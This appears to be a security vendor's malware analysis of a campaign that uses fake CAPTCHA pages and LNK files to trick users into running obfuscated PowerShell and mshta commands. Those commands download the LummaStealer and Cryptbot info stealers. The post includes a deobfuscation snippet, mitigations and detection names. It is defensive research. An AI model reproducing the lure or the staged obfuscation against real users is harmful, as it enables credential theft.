Malware Family: Bunny Loader
Table of Contents
Date of Publication: 09-20-2024
Executive Summary:
Over the past few months, Rapid7 has been tracking a threat group responsible for pushing out various info stealers, including LummaStealer and Cryptbot. Originally, this group relied on malicious .lnk files (Windows shortcut files) to compromise systems. However, in the past month, they shifted strategies to incorporate CAPTCHA-based social engineering techniques. Instead of relying solely on .lnk files, the new approach uses fake CAPTCHA challenges to deceive users into copying and pasting malicious PowerShell scripts into their command line interface. These scripts then execute and download info-stealing malware, compromising the victim’s sensitive information. This adaptation indicates a sophisticated approach, focusing on manipulating human behavior to bypass traditional defenses.
Overview:
- Original Attack Vector (LNK Files): The campaign initially relied on distributing .lnk files disguised as legitimate shortcuts to movies. When executed, these files triggered the download of malicious payloads.
- Recent Shift to CAPTCHA-Based Deception: In the last month, the threat actor moved away from using .lnk files as the primary delivery mechanism. They now employ fake CAPTCHA challenges as a key step in the infection process. Users are tricked into copying and pasting a provided PowerShell script, believing it to be a routine CAPTCHA bypass.
- Resulting Malware: The PowerShell scripts executed by the victims lead to the installation of info-stealing malware. This malware is designed to capture sensitive information such as credentials, financial data, and personal identifiers.
- Impact: This evolving tactic demonstrates the threat actor’s ability to adapt and refine their techniques, making it harder for both users and traditional security measures to detect the attack. It emphasizes the need for heightened awareness and advanced threat detection strategies.
Initial Access:
Starting in June 2024, Rapid7 observed users downloading malicious LNK files from websites that tricked them into thinking they were downloading movies. Upon execution, the LNK file contained commands that leveraged MSHTA to read content from a website hosting the next-stage payload.
Beginning in August of 2024, we observed a noticeable shift from the same threat group. Instead of using LNK files, they started to implement CAPTCHA challenges, tricking users into copying and pasting PowerShell commands in order to verify they were human. A common pattern identified with users being directed to URLs containing CAPTCHA challenges is that these URLs are hosted on Bunny CDN (b-cdn) servers, and the serving pages follow the naming convention captcha-verify.html. A search on VirusTotal revealed numerous domains, all hosting this same captcha-verify.html file.
Figure 1 - VirusTotal Results for URL’s Containing
captcha-verify.html
While analyzing the Captcha-Verify.html files, we observed that users were tricked into clicking the button, I'm not a robot. After interaction with the button, a new window appears, instructing the users to open a run window and paste in a command.
Figure 2 - Sample CAPTCHA Landing Page
Figure 3 - CAPTCHA Instructions to Run Command
After following the instructions, we observed that the command copied was designed to execute a Base64-encoded PowerShell command.
Figure 4 - CAPTCHA Instructions to Run Command
While looking at the source code of the html file, we identified the functions responsible for the behavior and observed that after the user interacts with the I'm not a robot button, they are instead copying a command that runs a Base64 encoded Powershell command.
Figure 5 - Source Code of
captcha-verify.html Revealing Copy Function
Initial Payloads:
After decoding the Base64 encoded Powershell command, we observed a call to a URL in order to retrieve an additional payload using mstha.exe:
Figure 6 - Decoding Base64 Encoded String
After navigating to the URL, we observed that it hosted a binary, nslookup.exe. While analyzing the binary nslookup.exe, we observed that it contained <script> tags within its code, indicating that the purpose of mshta.exe was to execute the code contained within the <script> tags.
Figure 7 - JavaScript Embedded within Binary
nslookup.exe
Initial analysis revealed that the code within the <script> tags was written in JavaScript (JS). We noticed that the script contained a large set of variables being assigned specific character (char) codes. Additionally, we identified a variable named FeH, which contained a function designed to convert a large set of the variables (which were assigned the char codes) into strings.
Figure 8 - Contents of the JS Code
We extracted this code from the binary and saved it as a JavaScript file. We then placed a Wscript.Echo(FeH) command at the end of the script in order to print out the contents of the variable FeH.
Figure 9 - Contents of the New JS Code
We observed that the variable FeH contained a new block of JavaScript code. After analysis of the new block of JavaScript code, we determined that its purpose was to decode additional data and execute it. We observed that a function, avv, contained a variable fSg="" which was implemented as a buffer in order to store the results from a loop: for (var aKH = 0; aKH < wdj.length; aKH++) {var dyK = String.fromCharCode(wdj[aKH] - 697);fSg = fSg + dyK}return fSg}.
We observed that the variable kqL contained a large array of numbers which were pushed into the function avv, which was responsible for converting each array value into a char code, which was then converted into a string. Following the same technique mentioned before, we placed a Wscript.Echo(kqL) in order to observe the results stored within the variable kqL.
The results for the variable kqL contained a second PowerShell Script.
Figure 10 - Decoded Code Revealing PowerShell Script
Second Stage Payload:
Upon execution of the code contained within the binary downloaded via MSHTA, we observe the execution of a second PowerShell script (Figure 10). This script is heavily obfuscated, and starts by transforming a Base64 encoded block of text into an array of bytes.
Figure 11 - The Function to Convert the Input String to an Array of Bytes
Once the byte array has been created, the script decrypts the byte array using an AES decryptor function.
Figure 12 - The Set of Commands to Decrypt the String Contained in the Variable
$bUrqA
The decrypted result is a string whose first three characters are iex (an alias of the Invoke-Expression cmdlet in PowerShell). These characters are split from and used to execute the rest of the string, which is a script containing five functions.
Figure 13 - Final PowerShell Script
The final function in this script, NHA, is the one that is executed using Invoke-Expression. This function leverages the other functions contained in the script to download a zip file from an obfuscated remote URL, extract its contents to the Temp directory, and execute the first item of the zip file contents.
Info Stealers:
The zip archive downloaded via the obfuscated PowerShell script is the final payload. The contents within the archive are seemingly random with each infection, but the important file is located at the top for the script to execute.
Figure 14 - Malicious Executable
0a4scandoc.exe Contained within tera1.zip
The executable masquerades as a legitimate binary, but upon closer inspection, is trojanized and contains the LummaStealer family of malware. In other cases, we have observed that the binaries contained within the zip archives have been known to be packed with other types of information stealers such as Cryptbot and StealC.
Mitigations:
➔ Ensure that all devices are configured with Rapid7’s Insight Agent.
➔ Provide user awareness training that’s aimed at informing users on how to identify such threats.
➔ Ensure that PowerShell execution is set to Restricted or AllAssigned, ensuring that only Signed Scripts can be executed.
➔ If MSHTA is not used for any legitimate business functions, disabling it can prevent it from being abused to download and execute malicious files.
- You can block mshta.exe using software restriction policies or AppLocker.
Rapid7 Customers:
InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7’s expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections deployed and alerting on the activity described in this blog:
- Malicious Document - MSHTA Spawned by Scripting Engine
- Malicious Document - MSHTA Retrieves From Remote Server
- Attacker Technique - Renamed PythonW.exe Executed From Non-Standard Folder
- Attacker Technique - PowerShell Download Cradles